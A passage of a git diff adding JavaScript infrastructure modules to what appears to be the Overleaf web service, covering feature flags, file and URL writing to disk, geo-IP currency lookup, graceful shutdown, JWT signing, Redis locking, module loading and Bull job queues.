+      (Boolean(Settings.saml) && Boolean(Settings.saml.enable)) ||
+      Boolean(Settings.overleaf)
+    )
+  },
+
+  /**
+   * Whether a feature is enabled in the application's configuration
+   *
+   * @param {string} feature
+   * @returns {boolean}
+   */
+  hasFeature(feature) {
+    switch (feature) {
+      case 'saas':
+        return Boolean(Settings.overleaf)
+      case 'homepage':
+        return Boolean(Settings.enableHomepage)
+      case 'registration-page':
+        return (
+          !Features.externalAuthenticationSystemUsed() ||
+          Boolean(Settings.overleaf)
+        )
+      case 'registration':
+        return Boolean(Settings.overleaf)
+      case 'chat':
+        return Boolean(Settings.disableChat) === false
+      case 'github-sync':
+        return
Boolean(Settings.enableGithubSync) + case 'git-bridge': + return Boolean(Settings.enableGitBridge) + case 'oauth': + return Boolean(Settings.oauth) + case 'templates-server-pro': + return Boolean(Settings.templates?.user_id) + case 'affiliations': + case 'analytics': + return Boolean(_.get(Settings, ['apis', 'v1', 'url'])) + case 'references': + return Boolean(_.get(Settings, ['apis', 'references', 'url'])) + case 'saml': + return Boolean(Settings.enableSaml) + case 'linked-project-file': + return Boolean(Settings.enabledLinkedFileTypes.includes('project_file')) + case 'linked-project-output-file': + return Boolean( + Settings.enabledLinkedFileTypes.includes('project_output_file') + ) + case 'link-url': + return Boolean( + _.get(Settings, ['apis', 'linkedUrlProxy', 'url']) && + Settings.enabledLinkedFileTypes.includes('url') + ) + case 'project-history-blobs': + return Boolean(Settings.enableProjectHistoryBlobs) + case 'filestore': + return Boolean(Settings.disableFilestore) === false + case 'support': + return supportModuleAvailable + case 'symbol-palette': + return symbolPaletteModuleAvailable + case 'track-changes': + return trackChangesModuleAvailable + default: + throw new Error(`unknown feature: ${feature}`) + } + }, +} + +module.exports = Features diff --git a/services/web/app/src/infrastructure/FileWriter.js b/services/web/app/src/infrastructure/FileWriter.js new file mode 100644 index 0000000..2c98028 --- /dev/null +++ b/services/web/app/src/infrastructure/FileWriter.js @@ -0,0 +1,179 @@ +/* eslint-disable + n/handle-callback-err, + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const fs = require('fs') +const OError = require('@overleaf/o-error') +const logger = require('@overleaf/logger') +const crypto = require('crypto') +const _ = require('lodash') +const Settings = require('@overleaf/settings') +const request = require('request') +const { Transform, pipeline } = require('stream') +const { FileTooLargeError } = require('../Features/Errors/Errors') +const { promisifyAll } = require('@overleaf/promise-utils') + +class SizeLimitedStream extends Transform { + constructor(options) { + options.autoDestroy = true + super(options) + + this.bytes = 0 + this.maxSizeBytes = options.maxSizeBytes || Settings.maxUploadSize + this.drain = false + this.on('error', () => { + this.drain = true + this.resume() + }) + } + + _transform(chunk, encoding, done) { + if (this.drain) { + // mechanism to drain the source stream on error, to avoid leaks + // we consume the rest of the incoming stream and don't push it anywhere + return done() + } + + this.bytes += chunk.length + if (this.maxSizeBytes && this.bytes > this.maxSizeBytes) { + return done( + new FileTooLargeError({ + message: 'stream size limit reached', + info: { size: this.bytes }, + }) + ) + } + this.push(chunk) + done() + } +} + +const FileWriter = { + ensureDumpFolderExists() { + fs.mkdirSync(Settings.path.dumpFolder, { recursive: true }) + }, + + writeLinesToDisk(identifier, lines, callback) { + if (callback == null) { + callback = function () {} + } + return FileWriter.writeContentToDisk(identifier, lines.join('\n'), callback) + }, + + writeContentToDisk(identifier, content, callback) { + if (callback == null) { + 
callback = function () {} + } + const fsPath = `${ + Settings.path.dumpFolder + }/${identifier}_${crypto.randomUUID()}` + return fs.writeFile(fsPath, content, function (error) { + if (error != null) { + return callback(error) + } + return callback(null, fsPath) + }) + }, + + writeStreamToDisk(identifier, stream, options, callback) { + if (typeof options === 'function') { + callback = options + options = {} + } + if (callback == null) { + callback = function () {} + } + options = options || {} + + const fsPath = `${ + Settings.path.dumpFolder + }/${identifier}_${crypto.randomUUID()}` + + const writeStream = fs.createWriteStream(fsPath) + const passThrough = new SizeLimitedStream({ + maxSizeBytes: options.maxSizeBytes, + }) + + // if writing fails, we want to consume the bytes from the source, to avoid leaks + for (const evt of ['error', 'close']) { + writeStream.on(evt, function () { + passThrough.unpipe(writeStream) + passThrough.resume() + }) + } + + pipeline(stream, passThrough, writeStream, function (err) { + if ( + options.maxSizeBytes && + passThrough.bytes >= options.maxSizeBytes && + !(err instanceof FileTooLargeError) + ) { + err = new FileTooLargeError({ + message: 'stream size limit reached', + info: { size: passThrough.bytes }, + }).withCause(err || {}) + } + if (err) { + OError.tag( + err, + '[writeStreamToDisk] something went wrong writing the stream to disk', + { + identifier, + fsPath, + } + ) + return callback(err) + } + + logger.debug( + { identifier, fsPath }, + '[writeStreamToDisk] write stream finished' + ) + callback(null, fsPath) + }) + }, + + writeUrlToDisk(identifier, url, options, callback) { + if (typeof options === 'function') { + callback = options + options = {} + } + if (callback == null) { + callback = function () {} + } + options = options || {} + callback = _.once(callback) + + const stream = request.get(url) + stream.on('error', function (err) { + logger.warn( + { err, identifier, url }, + '[writeUrlToDisk] something went wrong with writing to disk' + ) + callback(err) + }) + stream.on('response', function (response) { + if (response.statusCode >= 200 && response.statusCode < 300) { + FileWriter.writeStreamToDisk(identifier, stream, options, callback) + } else { + const err = new Error(`bad response from url: ${response.statusCode}`) + logger.warn({ err, identifier, url }, `[writeUrlToDisk] ${err.message}`) + return callback(err) + } + }) + }, +} + +module.exports = FileWriter +module.exports.promises = promisifyAll(FileWriter, { + without: ['ensureDumpFolderExists'], +}) +module.exports.SizeLimitedStream = SizeLimitedStream diff --git a/services/web/app/src/infrastructure/GeoIpLookup.js b/services/web/app/src/infrastructure/GeoIpLookup.js new file mode 100644 index 0000000..1f71e2a --- /dev/null +++ b/services/web/app/src/infrastructure/GeoIpLookup.js @@ -0,0 +1,127 @@ +const request = require('request') +const settings = require('@overleaf/settings') +const _ = require('lodash') +const logger = require('@overleaf/logger') +const { URL } = require('url') +const { promisify, promisifyMultiResult } = require('@overleaf/promise-utils') + +const DEFAULT_CURRENCY_CODE = 'USD' + +const currencyMappings = { + GB: 'GBP', + US: 'USD', + CH: 'CHF', + NZ: 'NZD', + AU: 'AUD', + DK: 'DKK', + NO: 'NOK', + CA: 'CAD', + SE: 'SEK', + SG: 'SGD', + IN: 'INR', + BR: 'BRL', + MX: 'MXN', + CO: 'COP', + CL: 'CLP', + PE: 'PEN', +} + +const validCurrencyParams = Object.values(currencyMappings).concat([ + 'EUR', + 'INR', + 'BRL', + 'MXN', + 'COP', + 'CLP', + 'PEN', +]) + +// 
Countries which would likely prefer the Euro
+const EuroCountries = [
+  'AT',
+  'BE',
+  'BG',
+  'HR',
+  'CY',
+  'CZ',
+  'EE',
+  'FI',
+  'FR',
+  'DE',
+  'EL',
+  'HU',
+  'IE',
+  'IT',
+  'LV',
+  'LT',
+  'LU',
+  'MT',
+  'NL',
+  'PL',
+  'PT',
+  'RO',
+  'SK',
+  'SI',
+  'ES',
+]
+
+_.forEach(EuroCountries, country => (currencyMappings[country] = 'EUR'))
+
+function isValidCurrencyParam(currency) {
+  if (!currency) {
+    return false
+  }
+  return validCurrencyParams.includes(currency)
+}
+
+function getDetails(ip, callback) {
+  if (!ip) {
+    return callback(new Error('no ip passed'))
+  }
+  ip = ip.trim().split(' ')[0]
+  const opts = {
+    url: new URL(ip, settings.apis.geoIpLookup.url).href,
+    timeout: 1000,
+    json: true,
+  }
+  logger.debug({ ip, opts }, 'getting geo ip details')
+  request.get(opts, function (err, res, ipDetails) {
+    if (err) {
+      logger.warn({ err, ip }, 'error getting ip details')
+    }
+    callback(err, ipDetails)
+  })
+}
+
+function getCurrencyCode(ip, callback) {
+  getDetails(ip, function (err, ipDetails) {
+    if (err || !ipDetails) {
+      logger.err(
+        { err, ip },
+        `problem getting currencyCode for ip, defaulting to ${DEFAULT_CURRENCY_CODE}`
+      )
+      return callback(null, DEFAULT_CURRENCY_CODE)
+    }
+    const countryCode =
+      ipDetails && ipDetails.country_code
+        ? ipDetails.country_code.toUpperCase()
+        : undefined
+    const currencyCode = currencyMappings[countryCode] || DEFAULT_CURRENCY_CODE
+    logger.debug({ ip, currencyCode, ipDetails }, 'got currencyCode for ip')
+    callback(err, currencyCode, countryCode)
+  })
+}
+
+module.exports = {
+  getDetails,
+  getCurrencyCode,
+  isValidCurrencyParam,
+  promises: {
+    getDetails: promisify(getDetails),
+    getCurrencyCode: promisifyMultiResult(getCurrencyCode, [
+      'currencyCode',
+      'countryCode',
+    ]),
+  },
+  DEFAULT_CURRENCY_CODE,
+}
diff --git a/services/web/app/src/infrastructure/GracefulShutdown.js b/services/web/app/src/infrastructure/GracefulShutdown.js
new file mode 100644
index 0000000..2446397
--- /dev/null
+++ b/services/web/app/src/infrastructure/GracefulShutdown.js
@@ -0,0 +1,150 @@
+/*
+  Graceful shutdown sequence:
+  - Stop background tasks that depend on the DB, like redis queues
+  - Stop processing new HTTP requests
+  - Wait for background tasks that depend on the DB, like polling that was
+    triggered by HTTP requests
+  - Drain/Close db connections
+  - Cleanup other background tasks, like metrics collectors
+  - By now the node app should exit on its own.
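+
+  A minimal wiring sketch (illustrative only; the label string, the `rclient`
+  handle and the `server` object are assumptions, not part of this module):
+
+    const { addConnectionDrainer, triggerGracefulShutdown } = require('./GracefulShutdown')
+    addConnectionDrainer('example redis client', async () => rclient.disconnect())
+    process.on('SIGTERM', () => triggerGracefulShutdown(server, 'SIGTERM'))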
+ */ + +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const Settings = require('@overleaf/settings') +const Metrics = require('@overleaf/metrics') +const sleep = require('util').promisify(setTimeout) +const optionalCleanupHandlersBeforeStoppingTraffic = [] +const requiredCleanupHandlersBeforeDrainingConnections = [] +const optionalCleanupHandlersAfterDrainingConnections = [] +const connectionDrainer = [] + +function addConnectionDrainer(label, handler) { + connectionDrainer.push({ label, handler }) +} + +function addOptionalCleanupHandlerBeforeStoppingTraffic(label, handler) { + optionalCleanupHandlersBeforeStoppingTraffic.push({ label, handler }) +} + +function addRequiredCleanupHandlerBeforeDrainingConnections(label, handler) { + requiredCleanupHandlersBeforeDrainingConnections.push({ label, handler }) +} + +function addOptionalCleanupHandlerAfterDrainingConnections(label, handler) { + optionalCleanupHandlersAfterDrainingConnections.push({ label, handler }) +} + +async function runHandlers(stage, handlers, logOnly) { + logger.info({ stage }, 'graceful shutdown: run handlers') + for (const { label, handler } of handlers) { + try { + await handler() + } catch (e) { + const err = OError.tag(e, 'handler failed', { stage, label }) + if (logOnly) { + logger.err({ err }, 'graceful shutdown: incomplete cleanup') + } else { + throw err + } + } + } +} + +/** + * @param {import('net').Server} server + * @param {string} signal + */ +async function gracefulShutdown(server, signal) { + logger.warn({ signal }, 'graceful shutdown: started shutdown sequence') + Settings.shuttingDown = true + + await runHandlers( + 'optionalBeforeStoppingTraffic', + optionalCleanupHandlersBeforeStoppingTraffic, + true + ) + + await sleep(Settings.gracefulShutdownDelayInMs) + try { + await new Promise((resolve, reject) => { + logger.warn({}, 'graceful shutdown: closing http server') + server.close(err => { + if (err) { + reject(OError.tag(err, 'http.Server.close failed')) + } else { + resolve() + } + }) + }) + } catch (err) { + throw OError.tag(err, 'stop traffic') + } + + await runHandlers( + 'requiredBeforeDrainingConnections', + requiredCleanupHandlersBeforeDrainingConnections + ) + + try { + await runHandlers('connectionDrainer', connectionDrainer) + + await runHandlers( + 'optionalAfterDrainingConnections', + optionalCleanupHandlersAfterDrainingConnections.concat([ + { label: 'metrics module', handler: () => Metrics.close() }, + ]) + ) + } catch (err) { + logger.err( + { err }, + 'graceful shutdown: failed after stopping traffic, exiting' + ) + // wait for logs to flush + await sleep(1000) + process.exit(1) + return + } + logger.info({}, 'graceful shutdown: ready to exit') +} + +function triggerGracefulShutdown(server, signal) { + gracefulShutdown(server, signal).catch(err => { + logger.err( + { err }, + 'graceful shutdown: incomplete cleanup, waiting for kill' + ) + }) +} + +class BackgroundTaskTracker { + constructor(label) { + // Do not leak any handles, just record the number of pending jobs. + // In case we miss the cleanup of one job, the worst thing that can happen + // is that we do not stop web "gracefully" before k8s kills it forcefully. + this.pendingBackgroundTasks = 0 + addRequiredCleanupHandlerBeforeDrainingConnections(label, async () => { + while (this.pendingBackgroundTasks > 0) { + await sleep(100) // try again in 100ms. 
+ } + }) + } + + add() { + this.pendingBackgroundTasks++ + } + + done() { + this.pendingBackgroundTasks-- + } +} + +module.exports = { + BackgroundTaskTracker, + addConnectionDrainer, + addOptionalCleanupHandlerBeforeStoppingTraffic, + addOptionalCleanupHandlerAfterDrainingConnections, + addRequiredCleanupHandlerBeforeDrainingConnections, + triggerGracefulShutdown, + gracefulShutdown, +} diff --git a/services/web/app/src/infrastructure/HttpPermissionsPolicy.js b/services/web/app/src/infrastructure/HttpPermissionsPolicy.js new file mode 100644 index 0000000..2c81ddb --- /dev/null +++ b/services/web/app/src/infrastructure/HttpPermissionsPolicy.js @@ -0,0 +1,88 @@ +// @ts-check + +const Settings = require('@overleaf/settings') + +/** + * @import { HttpPermissionsPolicy } from './types' + */ + +class HttpPermissionsPolicyMiddleware { + /** + * Initialise the middleware with a Permissions Policy config + * @param {HttpPermissionsPolicy} policy + */ + constructor(policy) { + this.middleware = this.middleware.bind(this) + if (policy) { + this.policy = this.buildPermissionsPolicy(policy) + } + } + + /** + * Checks the provided policy is valid + * @param {HttpPermissionsPolicy} policy + * @returns {boolean} + */ + validatePermissionsPolicy(policy) { + let policyIsValid = true + + if (!policy.allowed) { + return true + } + + for (const [directive, origins] of Object.entries(policy.allowed)) { + // Do any directives in the allowlist clash with the denylist? + if (policy.blocked && policy.blocked.includes(directive)) { + policyIsValid = false + } + if (!origins) { + policyIsValid = false + } + } + + return policyIsValid + } + + /** + * Constructs a Permissions-Policy header string from the given policy configuration + * @param {HttpPermissionsPolicy} policy + * @returns {string} + */ + buildPermissionsPolicy(policy) { + if (!this.validatePermissionsPolicy(policy)) { + throw new Error('Invalid Permissions-Policy header configuration') + } + + const policyElements = [] + + if (policy.blocked && policy.blocked.length > 0) { + policyElements.push( + policy.blocked.map(policyElement => `${policyElement}=()`).join(', ') + ) + } + + if (policy.allowed && Object.entries(policy.allowed).length > 0) { + policyElements.push( + Object.keys(policy.allowed) + .map(allowKey => `${allowKey}=(${policy.allowed[allowKey]})`) + .join(', ') + ) + } + + return policyElements.join(', ') + } + + middleware(req, res, next) { + if (this.policy && Settings.useHttpPermissionsPolicy) { + const originalRender = res.render + + res.render = (...args) => { + res.setHeader('Permissions-Policy', this.policy) + originalRender.apply(res, args) + } + } + next() + } +} + +module.exports = HttpPermissionsPolicyMiddleware diff --git a/services/web/app/src/infrastructure/JsonWebToken.js b/services/web/app/src/infrastructure/JsonWebToken.js new file mode 100644 index 0000000..0a49e97 --- /dev/null +++ b/services/web/app/src/infrastructure/JsonWebToken.js @@ -0,0 +1,22 @@ +const { callbackify, promisify } = require('util') +const JWT = require('jsonwebtoken') +const Settings = require('@overleaf/settings') + +const jwtSign = promisify(JWT.sign) + +async function sign(payload, options = {}) { + const key = Settings.jwt.key + const algorithm = Settings.jwt.algorithm + if (!key || !algorithm) { + throw new Error('missing JWT configuration') + } + const token = await jwtSign(payload, key, { ...options, algorithm }) + return token +} + +module.exports = { + sign: callbackify(sign), + promises: { + sign, + }, +} diff --git 
a/services/web/app/src/infrastructure/Keys.js b/services/web/app/src/infrastructure/Keys.js
new file mode 100644
index 0000000..cd177b9
--- /dev/null
+++ b/services/web/app/src/infrastructure/Keys.js
@@ -0,0 +1,8 @@
+// TODO: This file was created by bulk-decaffeinate.
+// Sanity-check the conversion and remove this comment.
+module.exports = {
+  queue: {
+    web_to_tpds_http_requests: 'web_to_tpds_http_requests',
+    tpds_to_web_http_requests: 'tpds_to_web_http_requests',
+  },
+}
diff --git a/services/web/app/src/infrastructure/LockManager.js b/services/web/app/src/infrastructure/LockManager.js
new file mode 100644
index 0000000..8c21409
--- /dev/null
+++ b/services/web/app/src/infrastructure/LockManager.js
@@ -0,0 +1,36 @@
+const settings = require('@overleaf/settings')
+const RedisWrapper = require('./RedisWrapper')
+const rclient = RedisWrapper.client('lock')
+
+const RedisWebLocker = require('@overleaf/redis-wrapper/RedisWebLocker')
+
+// this method creates a lock manager with the provided timeout options
+function createLockManager(options) {
+  return new RedisWebLocker({
+    rclient,
+    getKey(namespace, id) {
+      return `lock:web:${namespace}:${id}`
+    },
+    options,
+  })
+}
+
+// this is the default lock manager for web
+const LockManager = createLockManager(settings.lockManager)
+
+// this method creates a lock manager with a configurable timeout
+// it shares the lock keys with the default lock manager
+LockManager.withTimeout = function (timeout) {
+  const overrides = {
+    redisLockExpiry: timeout, // in seconds
+    slowExecutionThreshold: 0.5 * timeout * 1000, // in ms
+  }
+  const lockManagerSettingsWithTimeout = Object.assign(
+    {},
+    settings.lockManager,
+    overrides
+  )
+  return createLockManager(lockManagerSettingsWithTimeout)
+}
+
+module.exports = LockManager
diff --git a/services/web/app/src/infrastructure/LoggerSerializers.js b/services/web/app/src/infrastructure/LoggerSerializers.js
new file mode 100644
index 0000000..09d274a
--- /dev/null
+++ b/services/web/app/src/infrastructure/LoggerSerializers.js
@@ -0,0 +1,57 @@
+// TODO: This file was created by bulk-decaffeinate.
+// Sanity-check the conversion and remove this comment.
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+module.exports = {
+  user(user) {
+    if (user == null) {
+      return null
+    }
+    if (user._id == null) {
+      user = { _id: user }
+    }
+    return {
+      id: user._id,
+      email: user.email,
+      first_name: user.first_name,
+      last_name: user.last_name,
+    }
+  },
+
+  project(project) {
+    if (project == null) {
+      return null
+    }
+    if (project._id == null) {
+      project = { _id: project }
+    }
+    return {
+      id: project._id,
+      name: project.name,
+    }
+  },
+
+  docs(docs) {
+    if ((docs != null ? docs.map : undefined) == null) {
+      return
+    }
+    return docs.map(doc => ({
+      path: doc.path,
+      id: doc.doc,
+    }))
+  },
+
+  files(files) {
+    if ((files != null ?
files.map : undefined) == null) { + return + } + return files.map(file => ({ + path: file.path, + id: file.file, + })) + }, +} diff --git a/services/web/app/src/infrastructure/Metrics.js b/services/web/app/src/infrastructure/Metrics.js new file mode 100644 index 0000000..2185c3c --- /dev/null +++ b/services/web/app/src/infrastructure/Metrics.js @@ -0,0 +1,7 @@ +const Metrics = require('@overleaf/metrics') + +exports.analyticsQueue = new Metrics.prom.Counter({ + name: 'analytics_queue', + help: 'Number of events sent to the analytics queue', + labelNames: ['status', 'event_type'], +}) diff --git a/services/web/app/src/infrastructure/Modules.js b/services/web/app/src/infrastructure/Modules.js new file mode 100644 index 0000000..a21be43 --- /dev/null +++ b/services/web/app/src/infrastructure/Modules.js @@ -0,0 +1,222 @@ +const fs = require('fs') +const Path = require('path') +const { promisify, callbackify } = require('util') +const Settings = require('@overleaf/settings') +const Views = require('./Views') +const _ = require('lodash') + +const MODULE_BASE_PATH = Path.join(__dirname, '/../../../modules') + +const _modules = [] +let _modulesLoaded = false +const _hooks = {} +const _middleware = {} +let _viewIncludes = {} + +async function modules() { + if (!_modulesLoaded) { + await loadModules() + } + return _modules +} + +async function loadModulesImpl() { + const settingsCheckModuleCjs = Path.join( + MODULE_BASE_PATH, + 'settings-check', + 'index.js' + ) + const settingsCheckModuleEsm = Path.join( + MODULE_BASE_PATH, + 'settings-check', + 'index.mjs' + ) + if (fs.existsSync(settingsCheckModuleCjs)) { + await import(settingsCheckModuleCjs) + } else if (fs.existsSync(settingsCheckModuleEsm)) { + await import(settingsCheckModuleEsm) + } + for (const moduleName of Settings.moduleImportSequence || []) { + let path + if (fs.existsSync(Path.join(MODULE_BASE_PATH, moduleName, 'index.mjs'))) { + path = Path.join(MODULE_BASE_PATH, moduleName, 'index.mjs') + } else { + path = Path.join(MODULE_BASE_PATH, moduleName, 'index.js') + } + const module = await import(path) + const loadedModule = module.default || module + + loadedModule.name = moduleName + _modules.push(loadedModule) + if (loadedModule.viewIncludes) { + throw new Error( + `${moduleName}: module.viewIncludes moved into Settings.viewIncludes` + ) + } + if (loadedModule.dependencies) { + for (const dependency of loadedModule.dependencies) { + if (!Settings.moduleImportSequence.includes(dependency)) { + throw new Error( + `Module '${dependency}' listed as a dependency of '${moduleName}' is missing in the moduleImportSequence. 
Please also verify that it is available in the current environment.` + ) + } + } + } + } + _modulesLoaded = true + await attachHooks() + await attachMiddleware() +} + +const loadModules = _.memoize(loadModulesImpl) + +async function applyRouter(webRouter, privateApiRouter, publicApiRouter) { + for (const module of await modules()) { + if (module.router && module.router.apply) { + await module.router.apply(webRouter, privateApiRouter, publicApiRouter) + } + } +} + +async function applyNonCsrfRouter( + webRouter, + privateApiRouter, + publicApiRouter +) { + for (const module of await modules()) { + if (module.nonCsrfRouter != null) { + module.nonCsrfRouter.apply(webRouter, privateApiRouter, publicApiRouter) + } + if (module.router && module.router.applyNonCsrfRouter) { + module.router.applyNonCsrfRouter( + webRouter, + privateApiRouter, + publicApiRouter + ) + } + } +} + +async function start() { + for (const module of await modules()) { + await module.start?.() + } +} + +function loadViewIncludes(app) { + _viewIncludes = Views.compileViewIncludes(app) +} + +async function applyMiddleware(appOrRouter, middlewareName, options) { + if (!middlewareName) { + throw new Error( + 'middleware name must be provided to register module middleware' + ) + } + for (const module of await modules()) { + if (module[middlewareName]) { + module[middlewareName](appOrRouter, options) + } + } +} + +function moduleIncludes(view, locals) { + const compiledPartials = _viewIncludes[view] || [] + let html = '' + for (const compiledPartial of compiledPartials) { + html += compiledPartial(locals) + } + return html +} + +function moduleIncludesAvailable(view) { + return (_viewIncludes[view] || []).length > 0 +} + +async function linkedFileAgentsIncludes() { + const agents = {} + for (const module of await modules()) { + for (const name in module.linkedFileAgents) { + const agentFunction = module.linkedFileAgents[name] + agents[name] = agentFunction() + } + } + return agents +} + +async function attachHooks() { + for (const module of await modules()) { + const { promises, ...hooks } = module.hooks || {} + for (const hook in promises || {}) { + const method = promises[hook] + attachHook(hook, method) + } + for (const hook in hooks || {}) { + const method = hooks[hook] + attachHook(hook, promisify(method)) + } + } +} + +function attachHook(name, method) { + if (_hooks[name] == null) { + _hooks[name] = [] + } + _hooks[name].push(method) +} + +async function attachMiddleware() { + for (const module of await modules()) { + for (const middleware in module.middleware || {}) { + const method = module.middleware[middleware] + if (_middleware[middleware] == null) { + _middleware[middleware] = [] + } + _middleware[middleware].push(method) + } + } +} + +async function fireHook(name, ...args) { + // ensure that modules are loaded if we need to fire a hook + // this can happen if a script calls a method that fires a hook + if (!_modulesLoaded) { + await loadModules() + } + const methods = _hooks[name] || [] + const results = [] + for (const method of methods) { + const result = await method(...args) + results.push(result) + } + return results +} + +async function getMiddleware(name) { + // ensure that modules are loaded if we need to call a middleware + if (!_modulesLoaded) { + await loadModules() + } + return _middleware[name] || [] +} + +module.exports = { + applyNonCsrfRouter, + applyRouter, + linkedFileAgentsIncludes, + loadViewIncludes, + moduleIncludes, + moduleIncludesAvailable, + applyMiddleware, + start, + hooks: { + attach: 
attachHook, + fire: callbackify(fireHook), + }, + middleware: getMiddleware, + promises: { + hooks: { + fire: fireHook, + }, + }, +} diff --git a/services/web/app/src/infrastructure/Mongoose.js b/services/web/app/src/infrastructure/Mongoose.js new file mode 100644 index 0000000..a867757 --- /dev/null +++ b/services/web/app/src/infrastructure/Mongoose.js @@ -0,0 +1,57 @@ +const mongoose = require('mongoose') +const Settings = require('@overleaf/settings') +const Metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') +const { addConnectionDrainer } = require('./GracefulShutdown') + +mongoose.set('autoIndex', false) +mongoose.set('strictQuery', false) + +const connectionPromise = mongoose.connect( + Settings.mongo.url, + Settings.mongo.options +) + +connectionPromise + .then(mongooseInstance => { + Metrics.mongodb.monitor(mongooseInstance.connection.client) + }) + .catch(error => { + logger.error( + { error }, + 'Failed to connect to MongoDB - cannot set up monitoring' + ) + }) + +addConnectionDrainer('mongoose', async () => { + await connectionPromise + await mongoose.disconnect() +}) + +mongoose.connection.on('connected', () => + logger.debug('mongoose default connection open') +) + +mongoose.connection.on('error', err => + logger.err({ err }, 'mongoose error on default connection') +) + +mongoose.connection.on('disconnected', () => + logger.debug('mongoose default connection disconnected') +) + +if (process.env.MONGOOSE_DEBUG) { + mongoose.set('debug', (collectionName, method, query, doc) => + logger.debug({ collectionName, method, query, doc }, 'mongoose debug') + ) +} + +mongoose.plugin(schema => { + schema.options.usePushEach = true +}) + +mongoose.Promise = global.Promise + +mongoose.connectionPromise = connectionPromise + +module.exports = mongoose diff --git a/services/web/app/src/infrastructure/PackageVersions.js b/services/web/app/src/infrastructure/PackageVersions.js new file mode 100644 index 0000000..f2e22fc --- /dev/null +++ b/services/web/app/src/infrastructure/PackageVersions.js @@ -0,0 +1,16 @@ +const version = { + mathjax: '3.2.2', + dictionaries: '0.0.3', +} + +module.exports = { + version, + + lib(name) { + if (version[name] != null) { + return `${name}-${version[name]}` + } else { + return `${name}` + } + }, +} diff --git a/services/web/app/src/infrastructure/QueueWorkers.js b/services/web/app/src/infrastructure/QueueWorkers.js new file mode 100644 index 0000000..0b11795 --- /dev/null +++ b/services/web/app/src/infrastructure/QueueWorkers.js @@ -0,0 +1,110 @@ +const Features = require('./Features') +const Queues = require('./Queues') +const UserOnboardingEmailManager = require('../Features/User/UserOnboardingEmailManager') +const UserPostRegistrationAnalyticsManager = require('../Features/User/UserPostRegistrationAnalyticsManager') +const FeaturesUpdater = require('../Features/Subscription/FeaturesUpdater') +const { + addOptionalCleanupHandlerBeforeStoppingTraffic, + addRequiredCleanupHandlerBeforeDrainingConnections, +} = require('./GracefulShutdown') +const EmailHandler = require('../Features/Email/EmailHandler') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const Modules = require('./Modules') + +/** + * @typedef {{ + * data: {queueName: string,name?: string,data?: any}, + * }} BullJob + */ + +/** + * @param {string} queueName + * @param {(job: BullJob) => Promise<void>} handler + */ +function registerQueue(queueName, handler) { + if (process.env.QUEUE_PROCESSING_ENABLED === 'true') { + const 
queue = Queues.getQueue(queueName) + queue.process(handler) + registerCleanup(queue) + } +} + +function start() { + if (!Features.hasFeature('saas')) { + return + } + + registerQueue('scheduled-jobs', async job => { + const { queueName, name, data, options } = job.data + const queue = Queues.getQueue(queueName) + if (name) { + await queue.add(name, data || {}, options || {}) + } else { + await queue.add(data || {}, options || {}) + } + }) + + registerQueue('emails-onboarding', async job => { + const { userId } = job.data + await UserOnboardingEmailManager.sendOnboardingEmail(userId) + }) + + registerQueue('post-registration-analytics', async job => { + const { userId } = job.data + await UserPostRegistrationAnalyticsManager.postRegistrationAnalytics(userId) + }) + + registerQueue('refresh-features', async job => { + const { userId, reason } = job.data + await FeaturesUpdater.promises.refreshFeatures(userId, reason) + }) + + registerQueue('deferred-emails', async job => { + const { emailType, opts } = job.data + try { + await EmailHandler.promises.sendEmail(emailType, opts) + } catch (e) { + const error = OError.tag(e, 'failed to send deferred email') + logger.warn({ error, emailType }, error.message) + throw error + } + }) + + registerQueue('group-sso-reminder', async job => { + const { userId, subscriptionId } = job.data + try { + await Modules.promises.hooks.fire( + 'sendGroupSSOReminder', + userId, + subscriptionId + ) + } catch (e) { + const error = OError.tag( + e, + 'failed to send scheduled Group SSO account linking reminder' + ) + logger.warn({ error, userId, subscriptionId }, error.message) + throw error + } + }) +} + +function registerCleanup(queue) { + const label = `bull queue ${queue.name}` + + // Stop accepting new jobs. + addOptionalCleanupHandlerBeforeStoppingTraffic(label, async () => { + const justThisWorker = true + await queue.pause(justThisWorker) + }) + + // Wait for all jobs to process before shutting down connections. + addRequiredCleanupHandlerBeforeDrainingConnections(label, async () => { + await queue.close() + }) + + // Disconnect from redis is scheduled in queue setup. +} + +module.exports = { start, registerQueue } diff --git a/services/web/app/src/infrastructure/Queues.js b/services/web/app/src/infrastructure/Queues.js new file mode 100644 index 0000000..3784215 --- /dev/null +++ b/services/web/app/src/infrastructure/Queues.js @@ -0,0 +1,121 @@ +const Queue = require('bull') +const Settings = require('@overleaf/settings') +const Features = require('../infrastructure/Features') +const { addConnectionDrainer } = require('./GracefulShutdown') + +// Bull will keep a fixed number of the most recently completed jobs. This is +// useful to inspect recently completed jobs. The bull prometheus exporter also +// uses the completed job records to report on job duration. 
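+//
+// A minimal usage sketch (hedged: 'emails-onboarding' is one of the queues
+// configured below, and the payload shape matches what QueueWorkers expects):
+//
+//   const { getQueue } = require('./Queues')
+//   await getQueue('emails-onboarding').add({ userId })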
